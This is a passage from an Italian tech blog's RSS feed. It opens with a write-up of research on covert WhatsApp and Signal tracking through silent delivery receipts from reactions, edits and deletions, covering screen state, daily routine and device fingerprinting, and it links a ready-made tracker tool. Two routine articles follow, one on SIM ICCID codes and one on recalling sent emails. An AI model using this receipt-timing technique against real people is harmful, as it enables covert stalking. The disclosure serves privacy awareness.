<p>Se a primo avviso questo potrebbe sembrare un problema di privacy &#8220;da poco&#8221;, riflettendoci,<strong> è possibile in realtà tracciare con estrema precisione il comportamento degli utenti </strong>in relazione all&#8217;utilizzo dei loro smartphone, conoscendo semplicemente il numero di telefono. Realizzando infatti un semplice script, è possibile inviare, ad intervalli regolari ed in modo automatizzato, dei messaggi &#8220;invisibili&#8221; che, analizzati secondo quanto riportato nel paper, permettono di comprendere la relazione tra l&#8217;utente e lo smartphone. </p>



<p>Lo screenshot qui sopra riportato (il quale fa riferimento alla Figura 1 nel documento originale) mostra in modo molto chiaro <strong>il cuore della vulnerabilità</strong> descritta nel paper.<br>Gli autori hanno misurato il <strong>Round-Trip Time (RTT)</strong> delle <em>delivery receipts</em> di WhatsApp su iPhone, cioè il tempo che passa tra l’invio di un messaggio “silenzioso” e la ricezione della conferma di consegna dal dispositivo della vittima. La misura è stata fatta con una frequenza di <strong>1 ping al secondo</strong>.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="776" height="619" src="https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_001059.jpg" alt="" class="wp-image-35748" srcset="https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_001059.jpg 776w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_001059-300x239.jpg 300w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_001059-768x613.jpg 768w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_001059-380x303.jpg 380w" sizes="auto, (max-width: 776px) 100vw, 776px" /></figure>



<p>Il grafico mette a confronto due stati del telefono della vittima:</p>



<ul class="wp-block-list">
<li><strong>Screen On</strong> (schermo acceso)</li>



<li><strong>Screen Off</strong> (schermo spento)</li>
</ul>



<p>Sull’asse orizzontale c’è il <strong>tempo di risposta in millisecondi</strong>, su quello verticale la <strong>probabilità</strong> (distribuzione statistica degli RTT osservati).<br>Quello che emerge è una <strong>separazione netta delle due distribuzioni</strong>:</p>



<ul class="wp-block-list">
<li>Quando lo <strong>schermo è acceso</strong>, i delivery receipt tornano <strong>molto velocemente</strong>, quasi sempre <strong>sotto 1 secondo</strong>. Questo accade perché il sistema operativo mantiene CPU, rete e app in uno stato attivo, rispondendo immediatamente ai pacchetti.</li>



<li>Quando lo <strong>schermo è spento</strong>, i tempi di risposta aumentano in modo evidente, con RTT <strong>superiori a 1 secondo</strong>, spesso tra <strong>1.5 e 2.5 secondi</strong>. Qui entrano in gioco i meccanismi di risparmio energetico (sleep, deep sleep, background scheduling).</li>
</ul>



<p>Il punto fondamentale è che <strong>questa differenza è sistematica e stabile</strong>, non casuale. Un attaccante che osserva solo i tempi di ritorno delle ricevute può quindi stabilire con ottima affidabilità se il telefono della vittima è:</p>



<ul class="wp-block-list">
<li>in uso attivo</li>



<li>inattivo / in standby</li>
</ul>



<p>Il tutto <strong>senza inviare messaggi visibili</strong>, senza notifiche e senza che la vittima possa accorgersene.<br>Dal punto di vista pratico, questa figura dimostra che i delivery receipt diventano un <strong>sensore remoto dello stato del dispositivo</strong>. Ripetendo la misura nel tempo, si può ricostruire:</p>



<ul class="wp-block-list">
<li>cambiamenti improvvisi di attività</li>



<li>orari di utilizzo del telefono</li>



<li>pattern giornalieri (sonno, lavoro, pause)</li>
</ul>



<h2 id="quali-messaggi-vengono-utilizzati-per-tracciare-gli-utenti" class="wp-block-heading">Quali messaggi vengono utilizzati per tracciare gli utenti</h2>



<p>Nel capitolo <strong>“Delivery Receipt Sources”</strong> gli autori del paper spiegano <strong>da quali azioni concrete nascono le delivery receipt</strong> e, soprattutto, <strong>quali di queste azioni sono sfruttabili come canale laterale “silenzioso”</strong> per monitorare un utente senza che se ne accorga.<br>Il punto di partenza è chiarire che <strong>non solo i messaggi di testo</strong> generano una delivery receipt. Gli autori testano in modo sistematico diverse azioni supportate dai client di WhatsApp, Signal e Threema, osservando due aspetti per ciascuna:</p>



<ol class="wp-block-list">
<li>se l’azione genera una delivery receipt verso il mittente</li>



<li>se l’azione produce una notifica visibile per il destinatario</li>
</ol>



<p>Le azioni analizzate sono quattro:</p>



<ul class="wp-block-list">
<li>invio di un messaggio normale</li>



<li>modifica di un messaggio già inviato</li>



<li>reazione a un messaggio (emoji)</li>



<li>cancellazione di un messaggio (“delete for everyone”)</li>
</ul>



<p>Il risultato chiave è che <strong>WhatsApp e Signal inviano delivery receipt anche per reazioni, modifiche e cancellazioni</strong>, mentre <strong>Threema limita le ricevute ai soli messaggi normali</strong>. Questo dettaglio è cruciale perché molte di queste azioni <strong>non generano notifiche sul dispositivo della vittima</strong>.<br>In particolare, modificare o cancellare un messaggio <strong>non avvisa l’utente</strong> nella maggior parte dei casi, e quindi diventa un vettore perfetto per il tracciamento occulto. </p>



<h2 id="fingerprint-del-sistema-operativo-usato" class="wp-block-heading">Fingerprint del sistema operativo usato</h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="1009" src="https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_002626-1024x1009.jpg" alt="" class="wp-image-35750" srcset="https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_002626-1024x1009.jpg 1024w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_002626-300x296.jpg 300w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_002626-768x757.jpg 768w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_002626-80x80.jpg 80w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_002626-380x374.jpg 380w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_002626-800x788.jpg 800w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_002626-1160x1143.jpg 1160w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_002626.jpg 1372w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p>Il paper non si limita a dimostrare come sia possibile utilizzare i &#8220;messaggi&#8221; di cui sopra per tracciare l&#8217;attività dell&#8217;utente, ma si spinge oltre: nel capitolo &#8220;Device OS Fingerprinting&#8221;, infatti, la tecnica descritta viene sfruttata per identificare la tipologia di smartphone/sistema operativo in uso dal destinatario.<br>Gli autori spiegano che <strong>WhatsApp e Signal gestiscono delivery e read receipts in modo diverso a seconda del sistema operativo e del tipo di client</strong> (Android, iOS, Web, Desktop, macOS, Windows).<br>Queste differenze sono <strong>osservabili da remoto</strong> analizzando <strong>come</strong> e <strong>in che ordine</strong> arrivano le ricevute, non il loro contenuto.</p>



<p>La <strong>Figura 8</strong> del paper, qui sopra riportata, è il risultato di <strong>un attacco reale, in ambiente non controllato</strong>, usando <strong>solo delivery receipt silenziosi</strong> e <strong>senza alcuna interazione visibile con la vittima</strong>.<br>La figura mostra il <strong>tracciamento simultaneo di tre dispositivi appartenenti alla stessa persona</strong>:</p>



<ol class="wp-block-list">
<li><strong>Device[0]</strong> – smartphone principale</li>



<li><strong>Device[1]</strong> – computer di casa (WhatsApp Web su Chrome, LAN cablata)</li>



<li><strong>Device[9]</strong> – laptop di lavoro (client desktop WhatsApp su macOS, Wi-Fi)</li>
</ol>



<p>L’attaccante è uno <strong>spooky stranger</strong>: non è nei contatti, non c’è una chat attiva, invia solo <strong>ping silenziosi ogni 2 secondi</strong>. Sull’asse orizzontale c’è il <strong>tempo reale</strong>, su quello verticale il <strong>RTT delle delivery receipt</strong> in millisecondi.<br>In particolar modo:</p>



<p><strong>Smartphone (Device[0])</strong><br>Dai tempi di risposta delle delivery receipt si capisce quando il telefono è su Wi-Fi, quando passa a LTE, quando è in chiamata e quando torna su Wi-Fi. Questo permette di ricostruire spostamenti e contesto d’uso (casa → uscita → ufficio) senza vedere nulla sul dispositivo.</p>



<p><strong>Desktop di casa (Device[1])</strong><br>RTT estremamente stabili indicano una connessione LAN. La scomparsa improvvisa delle ricevute mostra il momento esatto in cui il computer viene spento, quindi quando l’utente lascia casa.</p>



<p><strong>Laptop di lavoro (Device[9])</strong><br>Nessuna receipt finché il dispositivo è spento; all’accensione arrivano molte ricevute insieme. Il loro formato e ordine consentono di identificare un client desktop macOS collegato via Wi-Fi.<strong>re il dispositivo in anticipo</strong>.</p>



<h2 id="exploit-pronto-alluso" class="wp-block-heading">Exploit pronto all&#8217;uso</h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="692" src="https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_003026-1024x692.jpg" alt="" class="wp-image-35752" srcset="https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_003026-1024x692.jpg 1024w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_003026-300x203.jpg 300w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_003026-768x519.jpg 768w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_003026-1536x1039.jpg 1536w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_003026-380x257.jpg 380w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_003026-800x541.jpg 800w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_003026-1160x784.jpg 1160w, https://luca-mercatanti.com/wp-content/uploads/2025/12/2025-12-31_003026.jpg 1983w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p>Dal paper in questione è nato il tool &#8220;<a href="https://github.com/gommzystudio/device-activity-tracker">Device Activity Tracker</a>&#8221; disponibile su GitHub, il quale permette, come anticipato all&#8217;inizio del presente articolo, di <strong>tracciare automaticamente il comportamento di un utente semplicemente conoscendone il numero di telefono ed in modo più o meno invisibile</strong>.</p>



<p></p>
<p>L'articolo <a href="https://luca-mercatanti.com/tracciare-gli-utenti-su-whatsapp-usando-le-ricevute-di-consegna/">Tracciare gli utenti su WhatsApp usando le ricevute di consegna</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/tracciare-gli-utenti-su-whatsapp-usando-le-ricevute-di-consegna/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Guida Completa all&#8217;ICCID della scheda SIM: cos&#8217;è, come trovarlo ed a cosa serve</title>
		<link>https://luca-mercatanti.com/guida-completa-alliccid-della-scheda-sim-cose-come-trovarlo-ed-a-cosa-serve/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=guida-completa-alliccid-della-scheda-sim-cose-come-trovarlo-ed-a-cosa-serve</link>
					<comments>https://luca-mercatanti.com/guida-completa-alliccid-della-scheda-sim-cose-come-trovarlo-ed-a-cosa-serve/#comments</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Fri, 21 Nov 2025 17:26:25 +0000</pubDate>
				<category><![CDATA[Varie]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35733</guid>

					<description><![CDATA[<p> L’ICCID, o codice seriale SIM, è un numero identificativo unico che serve a riconoscere la tua scheda SIM&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/guida-completa-alliccid-della-scheda-sim-cose-come-trovarlo-ed-a-cosa-serve/">Guida Completa all&#8217;ICCID della scheda SIM: cos&#8217;è, come trovarlo ed a cosa serve</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p> L’ICCID, o codice seriale SIM, è un numero identificativo unico che <strong>serve a riconoscere la tua scheda SIM in modo inequivocabile</strong>. Conoscere questo codice è fondamentale non solo per operazioni quotidiane come la portabilità del numero, ma anche per la sicurezza e la gestione della SIM stessa.<br>Scopo di questo articolo è approfondire in modo chiaro cosa rappresenta l’ICCID, come puoi trovarlo facilmente sul tuo smartphone Android o iPhone, e perché è così importante in diversi ambiti, dal semplice utilizzo personale fino alle applicazioni più avanzate come l’IoT.</p>



<h2 id="cose-liccid-e-a-cosa-serve" class="wp-block-heading">Cos&#8217;è l&#8217;ICCID e a cosa serve</h2>



<p>L’ICCID, acronimo di <strong>Integrated Circuit Card Identifier</strong>, è un numero seriale unico composto da 18-22 cifre che identifica in modo univoco la tua scheda SIM.<br>Questo codice è essenziale perché permette di distinguere ogni SIM nel mondo, <strong>fungendo da “impronta digitale” per la scheda.</strong></p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://luca-mercatanti.com/wp-content/uploads/2025/11/2025-11-21_181216-1024x639.jpg" alt="SIM ICCID" class="wp-image-35734" srcset="https://luca-mercatanti.com/wp-content/uploads/2025/11/2025-11-21_181216-1024x639.jpg 1024w, https://luca-mercatanti.com/wp-content/uploads/2025/11/2025-11-21_181216-300x187.jpg 300w, https://luca-mercatanti.com/wp-content/uploads/2025/11/2025-11-21_181216-768x479.jpg 768w, https://luca-mercatanti.com/wp-content/uploads/2025/11/2025-11-21_181216-1536x959.jpg 1536w, https://luca-mercatanti.com/wp-content/uploads/2025/11/2025-11-21_181216-380x237.jpg 380w, https://luca-mercatanti.com/wp-content/uploads/2025/11/2025-11-21_181216-800x499.jpg 800w, https://luca-mercatanti.com/wp-content/uploads/2025/11/2025-11-21_181216-1160x724.jpg 1160w, https://luca-mercatanti.com/wp-content/uploads/2025/11/2025-11-21_181216.jpg 1562w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p><strong>La struttura dell’ICCID comprende diversi blocchi:</strong> un identificatore dell’emittente (che indica il paese e l’operatore), il numero seriale della SIM e una cifra di controllo finale che serve a verificare la validità del codice. Grazie a questa composizione, l’ICCID è un codice affidabile e difficile da duplicare.</p>



<p>Questo codice è molto più di un semplice numero: <strong>viene utilizzato nelle operazioni di portabilità del numero, nell’attivazione e gestione della SIM, e contribuisce alla sicurezza della rete.</strong><br>A differenza dell’IMSI, che identifica l’abbonato, o dell’IMEI, che identifica il dispositivo,<strong> l’ICCID identifica esclusivamente la SIM</strong>. Inoltre, l’ICCID sta assumendo un ruolo chiave anche nell’ambito dell’IoT e delle SIM M2M (machine-to-machine), dove la gestione sicura e remota dei dispositivi è fondamentale.</p>



<p><strong>In poche parole, l’ICCID è il codice che ti permette di riconoscere la tua SIM in modo affidabile e di effettuare con sicurezza molte operazioni legate alla tua linea mobile.</strong></p>



<h2 id="definizione-e-struttura-delliccid" class="wp-block-heading"><br>Definizione e struttura dell&#8217;ICCID</h2>



<p>L’ICCID è composto da tre parti principali:</p>



<ul class="wp-block-list">
<li><strong>Identificatore emittente:</strong> le prime due cifre, solitamente “89”, indicano che si tratta di una scheda SIM. Seguono altre cifre che specificano il paese e l’operatore.</li>



<li><strong>Numero seriale della SIM:</strong> una sequenza di 15-19 cifre che rappresenta il codice univoco assegnato alla scheda.</li>



<li><strong>Cifra di controllo:</strong> l’ultima cifra, calcolata con l’algoritmo di Luhn, serve a verificare la correttezza dell’intero numero e a prevenire errori di trascrizione.</li>
</ul>



<p>Ad esempio, <strong>un ICCID italiano tipico inizia con “8939”</strong>, seguito dal numero seriale e termina con la cifra di controllo. L’<a href="https://it.wikipedia.org/wiki/Formula_di_Luhn">algoritmo di Luhn</a>, usato anche per validare carte di credito, somma e verifica le cifre secondo uno schema preciso, assicurando che il codice non sia stato digitato erroneamente o falsificato.</p>



<h3 id="differenza-tra-iccid-imsi-e-imei" class="wp-block-heading">Differenza tra ICCID, IMSI e IMEI</h3>



<p>È facile confondere i codici ICCID, IMSI e IMEI, ma ognuno ha una funzione specifica:</p>



<ul class="wp-block-list">
<li><strong>ICCID:</strong> identifica la scheda SIM, è il numero seriale unico della SIM stessa.</li>



<li><strong>IMSI (International Mobile Subscriber Identity):</strong> identifica l’abbonato o utente associato alla SIM, ed è usato dalla rete per autenticare la tua linea.</li>



<li><strong>IMEI (International Mobile Equipment Identity):</strong> identifica il dispositivo fisico, come il tuo smartphone o tablet.</li>
</ul>



<p>Quando ti viene richiesto l’ICCID? Ad esempio, durante la portabilità del numero o per bloccare la SIM in caso di furto. L’IMSI è invece gestito dagli operatori per riconoscere l’utente sulla rete, mentre l’IMEI serve a bloccare o sbloccare il dispositivo. Capire queste differenze ti aiuterà a fornire sempre le informazioni corrette e a gestire al meglio la sicurezza del tuo telefono e della tua linea.</p>



<h2 id="come-trovare-liccid-sulla-tua-scheda-sim" class="wp-block-heading">Come trovare l&#8217;ICCID sulla tua scheda SIM</h2>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="798" height="252" src="https://luca-mercatanti.com/wp-content/uploads/2025/11/iccid-sim.jpg" alt="" class="wp-image-35737" srcset="https://luca-mercatanti.com/wp-content/uploads/2025/11/iccid-sim.jpg 798w, https://luca-mercatanti.com/wp-content/uploads/2025/11/iccid-sim-300x95.jpg 300w, https://luca-mercatanti.com/wp-content/uploads/2025/11/iccid-sim-768x243.jpg 768w, https://luca-mercatanti.com/wp-content/uploads/2025/11/iccid-sim-380x120.jpg 380w" sizes="auto, (max-width: 798px) 100vw, 798px" /><figcaption class="wp-element-caption">Posizione ICCID stampato sulle SIM card</figcaption></figure>
</div>


<p>Trovare il codice ICCID è più semplice di quanto pensi, ma i metodi variano a seconda del dispositivo che usi. Puoi recuperare l’ICCID in tre modi principali:</p>



<ul class="wp-block-list">
<li><strong>Direttamente sulla scheda SIM fisica;</strong></li>



<li><strong>Tramite le impostazioni del sistema operativo del tuo smartphone (Android o iOS);</strong></li>



<li><strong>Usando app di terze parti, quando il codice non è visibile nelle impostazioni.</strong></li>
</ul>



<p>Su Android stock e Xiaomi, ad esempio, puoi trovare l’ICCID facilmente nelle impostazioni di sistema. Su iPhone hai un percorso diretto nelle impostazioni e puoi anche usare strumenti desktop come iTunes o Finder. Se il telefono non funziona o il codice non è visibile, la scheda fisica è sempre un metodo affidabile.</p>



<h3 id="metodi-per-dispositivi-android" class="wp-block-heading">Metodi per dispositivi Android</h3>



<p>Su smartphone Android “stock”, come Google Pixel, puoi trovare l’ICCID seguendo questo percorso: <strong>Impostazioni > Informazioni sul telefono > Stato SIM</strong>. Qui troverai il codice seriale SIM elencato insieme ad altre informazioni sulla rete.<br>Tuttavia, su alcuni brand come Huawei e Samsung, il codice ICCID potrebbe non essere visibile nelle impostazioni per motivi di design o sicurezza. In questi casi, puoi ricorrere a un’app di terze parti affidabile per leggere l’ICCID senza dover estrarre la SIM.</p>



<p>Su Xiaomi, invece, il percorso è leggermente diverso: <strong>Impostazioni > Info sistema > Stato SIM</strong>. Qui il codice è generalmente disponibile senza problemi.</p>



<h4 id="metodi-per-dispositivi-iphone-e-ios" class="wp-block-heading">Metodi per dispositivi iPhone e iOS</h4>



<p>Su iPhone puoi trovare l’ICCID direttamente nelle impostazioni di sistema seguendo questo percorso:&nbsp;<strong>Impostazioni &gt; Generali &gt; Info</strong>. Scorrendo verso il basso, troverai il codice ICCID elencato chiaramente tra le informazioni della SIM.</p>



<p>Se hai una SIM integrata (eSIM), vedrai anche il codice EID, un identificatore digitale correlato ma diverso dall’ICCID.</p>



<p>In alternativa, puoi collegare il tuo iPhone a un PC o Mac e usare iTunes (su Windows o macOS Mojave e precedenti) oppure Finder (su macOS Catalina e successivi) per visualizzare l’ICCID. Questo metodo è utile se il telefono ha problemi o se preferisci controllare il codice da desktop.</p>



<h3 id="trovare-liccid-sulla-scheda-fisica" class="wp-block-heading">Trovare l&#8217;ICCID sulla scheda fisica</h3>



<p><strong>L’ICCID è stampato direttamente sulla tua scheda SIM o sul supporto cartaceo che ti ha fornito l’operatore.</strong> Si tratta di un lungo numero di 19-22 cifre, spesso posizionato vicino al codice PIN o ad altri numeri identificativi.<br>Per riconoscerlo, cerca la sequenza più lunga di cifre stampate, che inizia solitamente con “89” e termina con la cifra di controllo. È importante annotare questo numero o fotografarlo e conservarlo in un luogo sicuro.</p>



<h2 id="perche-liccid-e-importante" class="wp-block-heading">Perché l&#8217;ICCID è importante</h2>



<p>L’ICCID è un codice fondamentale in molte operazioni legate alla tua scheda SIM. È indispensabile per:</p>



<ul class="wp-block-list">
<li><strong>Attivare nuove SIM</strong> e associare correttamente la scheda al tuo numero;</li>



<li><strong>Effettuare la portabilità </strong>del numero da un operatore all’altro senza errori;</li>



<li><strong>Recuperare il codice PUK</strong> in caso di blocco della SIM;</li>



<li><strong>Bloccare o disabilitare la SIM</strong> in caso di furto o smarrimento del telefono, garantendo la sicurezza della tua linea.</li>
</ul>



<h2 id="applicazioni-pratiche-attivazione-assistenza-e-sicurezza" class="wp-block-heading">Applicazioni pratiche: attivazione, assistenza e sicurezza</h2>



<p>Quando attivi una nuova SIM, l’operatore ti chiederà spesso il codice ICCID per associare la scheda al tuo numero telefonico in modo univoco. Durante l’assistenza, ad esempio per recuperare il codice PUK o bloccare la SIM, l’ICCID è un elemento chiave per verificare la tua identità.<br>In caso di furto o smarrimento del telefono, fornendo l’ICCID all’operatore potrai bloccare la SIM, impedendo che venga usata da altri. Durante la portabilità del numero, il codice assicura che il passaggio tra operatori avvenga senza problemi.</p>



<h2 id="domande-frequenti-e-approfondimenti" class="wp-block-heading">Domande frequenti e approfondimenti</h2>



<h3 id="differenze-tra-iccid-e-altri-identificatori" class="wp-block-heading">Differenze tra ICCID e altri identificatori</h3>



<p>L’ICCID identifica la scheda SIM, mentre l’IMSI identifica l’abbonato e l’IMEI il dispositivo fisico. Il codice EID, infine, è specifico per le eSIM, la SIM digitale integrata. Conoscere a cosa serve ciascun codice ti evita errori durante operazioni come la portabilità o l’assistenza, aiutandoti a fornire sempre il numero giusto al momento giusto.</p>



<h3 id="come-interpretare-e-decodificare-il-numero-iccid" class="wp-block-heading">Come interpretare e decodificare il numero ICCID</h3>



<p>Il numero ICCID è suddiviso in blocchi con significati precisi:</p>



<ul class="wp-block-list">
<li>Le prime cifre indicano l’emittente e il paese;</li>



<li>Le cifre centrali rappresentano il numero seriale della SIM;</li>



<li>L’ultima cifra è la cifra di controllo, calcolata con l’algoritmo di Luhn, che verifica la correttezza del codice.</li>
</ul>



<p>Questo algoritmo, usato anche per carte di credito, somma le cifre in modo specifico per garantire che il codice non sia errato o contraffatto. Per decodificare un ICCID puoi usare strumenti online o software dedicati, molto utili per professionisti o operatori.</p>
<p>L'articolo <a href="https://luca-mercatanti.com/guida-completa-alliccid-della-scheda-sim-cose-come-trovarlo-ed-a-cosa-serve/">Guida Completa all&#8217;ICCID della scheda SIM: cos&#8217;è, come trovarlo ed a cosa serve</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/guida-completa-alliccid-della-scheda-sim-cose-come-trovarlo-ed-a-cosa-serve/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Annullare un&#8217;email inviata</title>
		<link>https://luca-mercatanti.com/annullare-unemail-inviata/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=annullare-unemail-inviata</link>
					<comments>https://luca-mercatanti.com/annullare-unemail-inviata/#comments</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Wed, 10 Sep 2025 21:43:32 +0000</pubDate>
				<category><![CDATA[Web]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35717</guid>

					<description><![CDATA[<p>Un attimo di distrazione, il dito che si posa troppo in fretta su “Invia” e la domanda ti&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/annullare-unemail-inviata/">Annullare un&#8217;email inviata</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Un attimo di distrazione, il dito che si posa troppo in fretta su “Invia” e la domanda ti assale: si può <strong>annullare un&#8217;email inviata</strong>? In un’epoca in cui ogni messaggio rischia di correre più veloce della riflessione, la possibilità di correre ai ripari dopo un invio errato non è più solo una speranza: è una necessità concreta.</p>
<p>Conoscere a fondo le opzioni per <strong>annullare l’invio</strong>, i limiti tecnici e le strategie per evitare errori irreversibili è oggi un’abilità chiave. In queste righe scoprirai come agire subito, cosa puoi davvero aspettarti da ogni piattaforma e come prepararti per non andare mai più nel panico dopo un click di troppo.</p>
<h2 id="come-funziona-lannullamento-di-unemail-ed-i-limiti-tecnici">Come funziona l&#8217;annullamento di un&#8217;email ed i limiti tecnici</h2>
<p>L’idea che un’email possa sparire come per magia dal server del destinatario è affascinante, ma la realtà è molto più intricata. Quando premi “Invia”, il messaggio viene duplicato: una copia resta nella tua “Posta inviata”, l’altra viene transitata attraverso server intermedi fino a giungere nella casella del destinatario, spesso in frazioni di secondo.</p>
<p>Alcuni provider offrono strumenti e finestre temporali precise, ma la certezza della sparizione totale della mail inviata rimane un miraggio, soprattutto all’esterno di circuiti proprietari e controllati come <strong>Microsoft Exchange</strong>.</p>
<h3 id="fattori-che-rendono-lannullamento-impossibile-server-notifiche-lettura-offline">Fattori che rendono l&#8217;annullamento impossibile (server, notifiche, lettura offline)</h3>
<p>I limiti del <strong>periodo di annullamento dell’invio</strong> e della procedura di richiamo sono molteplici e tecnici: basta una sincronizzazione rapida tra server o che il destinatario abbia già visualizzato una notifica o un’anteprima sul dispositivo perché il tentativo fallisca. Anche solo l’accesso offline, cioè la ricezione locale della mail senza connessione attiva, rende inutile il richiamo.</p>
<p>I <strong>ritardi del server</strong>, differenze tra client, utilizzo di servizi non compatibili – come la mancanza di circuiti <strong>Exchange</strong> (vedi <strong>Outlook</strong>) – o semplicemente la prontezza del destinatario nel leggere la posta, sono tutte incognite che giocano contro una correzione efficace.<br />
Il margine di manovra, insomma, è davvero ridotto e richiede di agire con lucidità e rapidità.</p>
<h2 id="gmail-come-annullare-linvio-web-e-app-impostazione-e-passaggi">Gmail: come annullare l&#8217;invio (web e app) — impostazione e passaggi</h2>
<p>La filosofia di <strong>Gmail</strong> punta sulla prevenzione piuttosto che sul recupero: il provider in questione offre un vero <strong>periodo di annullamento dell’invio</strong> che può essere personalizzato.<br />
L’azione non è retroattiva: se la finestra temporale è scaduta, la mail resta definitivamente nella Posta inviata e sul server destinatario.<br />
Tuttavia, se imposti correttamente le opzioni, quell’inevitabile barra che appare dopo ogni invio può diventare la tua migliore alleata.</p>
<h3 id="abilitare-periodo-di-annullamento-su-gmail">Abilitare periodo di annullamento su Gmail</h3>
<p>Per avere il massimo controllo, accedi alle impostazioni dal computer, clicca sull’icona a ingranaggio e scegli “Visualizza tutte le impostazioni”. Nella scheda “Generali”, vai alla voce <strong>Periodo di annullamento dell’invio</strong>. Qui puoi scegliere tra 5, 10, 20 o 30 secondi: si tratta della finestra di tempo disponibile per agire dopo l’invio.</p>
<p>Ricorda di cliccare “Salva modifiche” prima di uscire. Solo così il valore selezionato sarà attivo e ti comparirà regolarmente la notifica utile dopo ogni invio. Su smartphone Android o iOS, la versione app offre un margine più ridotto – solo 5 secondi – ma azionabile in modo identico sulle successive conversazioni.</p>
<h3 id="dove-appare-il-pulsante-annulla-su-web-e-mobile">Dove appare il pulsante Annulla su web e mobile</h3>
<p>Appena mandi una mail, sul web compare subito un riquadro in basso a sinistra: “Messaggio inviato”. Qui trovi il tasto “Annulla”, spesso affiancato da “Visualizza messaggio”, per un controllo immediato. Cliccando su “Annulla”, l’invio viene bloccato e il messaggio si riapre in bozza, pronto all’edizione o alla correzione degli errori.</p>
<p><a href="https://luca-mercatanti.com/wp-content/uploads/2025/09/annullare-invio-email.jpg"><img loading="lazy" decoding="async" class="size-full wp-image-35719 aligncenter" src="https://luca-mercatanti.com/wp-content/uploads/2025/09/annullare-invio-email.jpg" alt="" width="615" height="190" srcset="https://luca-mercatanti.com/wp-content/uploads/2025/09/annullare-invio-email.jpg 615w, https://luca-mercatanti.com/wp-content/uploads/2025/09/annullare-invio-email-300x93.jpg 300w, https://luca-mercatanti.com/wp-content/uploads/2025/09/annullare-invio-email-380x117.jpg 380w" sizes="auto, (max-width: 615px) 100vw, 615px" /></a></p>
<p>Sull’app mobile, il pulsante “Annulla” si trova invece in basso a destra, con una barra visiva che scorre: il tempo di azione è più breve, ma può salvare da molti impicci nelle conversazioni quotidiane in mobilità.</p>
<h2 id="outlook-opzioni-web-e-client-come-richiamare-e-requisiti">Outlook: opzioni web e client — come richiamare e requisiti</h2>
<p>Per chi lavora in ambienti professionali, <strong>Outlook</strong> offre una doppia via: una breve finestra di annullamento simile a quella di <strong>Gmail</strong> nella versione web e la possibilità di <strong>richiamare il messaggio</strong> attraverso il client desktop, ma solo in contesti aziendali strutturati.</p>
<p>Il funzionamento concreto dipende da quale versione utilizzi e dal sistema informatico dell’organizzazione: solo chi opera interamente su <strong>Microsoft Exchange</strong> o <strong>Microsoft 365</strong> può beneficiare della seconda opzione.</p>
<h3 id="impostare-annulla-invio-in-outlook-web">Impostare Annulla invio in Outlook Web</h3>
<p>Entrando nelle impostazioni (icona a ingranaggio), scegli “Visualizza tutte le impostazioni di Outlook” e vai su “Componi e rispondi”. Qui attivi il comando <strong>Annulla invio</strong>, scegliendo tra 5 e 10 secondi: questa è la tua finestra per bloccare la partenza dei messaggi su Outlook Web.</p>
<p>Dopo ogni invio, appare un pulsante in basso a sinistra per annullare all’ultimo secondo, molto simile all’interfaccia <strong>Gmail</strong>. Clicca pronto: il tempo scorre in fretta e superato il limite la possibilità si esaurisce.</p>
<h3 id="richiamo-da-client-outlook-requisiti-exchange-365-e-risultato">Richiamo da client Outlook: requisiti Exchange/365 e risultato</h3>
